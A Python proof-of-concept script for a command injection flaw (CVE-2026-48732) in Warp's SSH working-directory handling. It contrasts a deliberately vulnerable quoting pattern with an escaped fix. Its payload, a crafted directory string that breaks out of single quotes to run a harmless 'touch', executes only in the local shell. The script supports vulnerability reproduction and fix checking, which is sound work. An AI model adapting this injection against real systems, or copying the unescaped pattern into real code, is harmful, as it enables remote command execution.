#!/usr/bin/env python3
"""
CVE-2026-48732 Proof of Concept.
This script safely reproduces the vulnerable shell command construction pattern
from Warp's legacy SSH background command path. It runs only against the local
shell and uses a marker file to demonstrate whether command injection occurred.
"""
from __future__ import annotations
import argparse
from pathlib import Path
import shlex
import subprocess
import sys
import tempfile
# Default marker path written by the payload. NOTE(review): this is a fixed,
# predictable name in a directory that is typically shared and world-writable;
# main() unlinks it before each run unless --keep-existing-marker is given,
# otherwise a file that was already present would make the SUCCESS report
# ambiguous.
DEFAULT_MARKER = "/tmp/warp_cve_2026_48732_confirmed"
def shell_escape_single_quotes_for_posix(value: str) -> str:
    """Return *value* safe to embed inside a POSIX single-quoted argument.

    Every embedded ``'`` becomes ``'"'"'``: close the single-quoted string,
    emit a literal quote inside double quotes, then reopen single quotes.
    Nothing else is touched, since no other character is special inside
    single quotes.
    """
    close_quote_reopen = "'\"'\"'"
    return close_quote_reopen.join(value.split("'"))
def build_vulnerable_command(current_directory_path: str, command: str) -> str:
    """Build the legacy helper command exactly as the vulnerable code did.

    Produces ``cd '<current_directory_path>' && <command>``. The path is
    interpolated verbatim, so a ``'`` inside it terminates the quoted ``cd``
    argument and whatever follows is parsed as shell syntax.
    """
    quoted_cd = "cd '" + current_directory_path + "'"
    return " && ".join((quoted_cd, command))
def build_fixed_command(current_directory_path: str, command: str) -> str:
    """Build the helper command with the cwd's single quotes escaped.

    Same shape as the vulnerable builder, ``cd '<path>' && <command>``, but
    the path goes through shell_escape_single_quotes_for_posix() first so a
    ``'`` inside it cannot terminate the quoted ``cd`` argument. Only the
    path is escaped; *command* is interpolated as-is.
    """
    pieces = (
        "cd '",
        shell_escape_single_quotes_for_posix(current_directory_path),
        "' && ",
        command,
    )
    return "".join(pieces)
def remove_marker(marker: Path) -> None:
    """Delete *marker* if present; a marker that does not exist is not an error.

    Only the not-found case is tolerated. A permission error, or a directory
    sitting at this path, still propagates to the caller.
    """
    marker.unlink(missing_ok=True)
def run_shell(command: str) -> subprocess.CompletedProcess[str]:
    """Run *command* through ``/bin/sh -c`` and return the completed process.

    Handing a string to the shell is deliberate here: the PoC exists to show
    what the generated helper command does when a shell parses it. stdout and
    stderr are captured as text, and ``check=False`` leaves a non-zero exit
    status in the result instead of raising.
    """
    shell_argv = ["/bin/sh", "-c", command]
    run_options = {"check": False, "text": True, "capture_output": True}
    return subprocess.run(shell_argv, **run_options)
def parse_args() -> argparse.Namespace:
    """Parse the command line for the local PoC.

    Options:
      --mode {vulnerable,fixed}   which command builder to exercise
                                  (default: vulnerable)
      --marker PATH               file the payload creates
                                  (default: DEFAULT_MARKER)
      --keep-existing-marker      do not unlink a pre-existing marker first
    """
    parser = argparse.ArgumentParser(
        description="Local PoC for CVE-2026-48732 Warp SSH cwd command injection."
    )
    add_option = parser.add_argument
    add_option(
        "--mode",
        choices=("vulnerable", "fixed"),
        default="vulnerable",
        help="Run the vulnerable or fixed command builder.",
    )
    add_option(
        "--marker",
        default=DEFAULT_MARKER,
        help=f"Marker file created by the payload. Default: {DEFAULT_MARKER}",
    )
    add_option(
        "--keep-existing-marker",
        action="store_true",
        help="Do not remove an existing marker before running.",
    )
    return parser.parse_args()
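def _build_payload_cwd(base_dir: Path, marker: Path) -> str:
    """Return the attacker-controlled cwd string used by the simulation.

    The value closes the single-quoted ``cd`` argument, appends a harmless
    ``touch`` of *marker*, then reopens a quote so the rest of the helper
    command still parses. *marker* is shlex-quoted so the payload itself
    cannot be broken by an unusual marker path.
    """
    return f"{base_dir}'; touch {shlex.quote(str(marker))}; echo '"


def _print_run(result: subprocess.CompletedProcess[str]) -> None:
    """Echo the captured stdout/stderr and the exit code of the executed command."""
    if result.stdout:
        print("[*] stdout:")
        print(result.stdout.rstrip())
    if result.stderr:
        print("[*] stderr:")
        print(result.stderr.rstrip())
    print(f"[*] Exit code: {result.returncode}")


def _report(mode: str, marker: Path, marker_preexisted: bool) -> int:
    """Print the verdict and return the exit status for main().

    Returns 0 when the marker is present (injection reproduced) or, in
    ``fixed`` mode, absent (escaping held); 1 when ``vulnerable`` mode did
    not create the marker. A marker that already existed before the run is
    flagged, because its presence then says nothing about the command.
    """
    if marker.exists():
        print(f"[!] SUCCESS: {marker} was created.")
        print("[!] Command injection behavior confirmed in the local simulation.")
        if marker_preexisted:
            print("[!] WARNING: the marker existed before the run; this result is not conclusive.")
        return 0
    if mode == "fixed":
        print(f"[+] OK: {marker} was not created.")
        print("[+] Escaping prevented the injected shell syntax from executing.")
        return 0
    print(f"[-] Failure: {marker} was not created.")
    return 1


def main() -> int:
    """Run the local simulation.

    Returns 2 on a usage error (relative marker path), otherwise the status
    from _report(): 0 for the expected outcome of the chosen mode, 1 when the
    vulnerable builder did not reproduce the injection.
    """
    args = parse_args()
    marker = Path(args.marker)
    if not marker.is_absolute():
        print("[-] Marker must be an absolute path.", file=sys.stderr)
        return 2
    if not args.keep_existing_marker:
        remove_marker(marker)
    # With --keep-existing-marker the file may already be present; remember
    # that so the verdict can be qualified instead of reported as a clean hit.
    marker_preexisted = marker.exists()
    build_command = (
        build_fixed_command if args.mode == "fixed" else build_vulnerable_command
    )
    with tempfile.TemporaryDirectory(prefix="warp-cve-2026-48732-") as safe_dir:
        malicious_cwd = _build_payload_cwd(Path(safe_dir), marker)
        full_command = build_command(malicious_cwd, "pwd")
        print(f"[*] Mode: {args.mode}")
        print("[*] Attacker-controlled remote cwd:")
        print(f" {malicious_cwd}")
        print("[*] Generated helper command:")
        print(f" {full_command}")
        print("[*] Executing generated command locally via /bin/sh...")
        _print_run(run_shell(full_command))
        return _report(args.mode, marker, marker_preexisted)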
if __name__ == "__main__":
    # Use main()'s return value as the process exit status.
    sys.exit(main())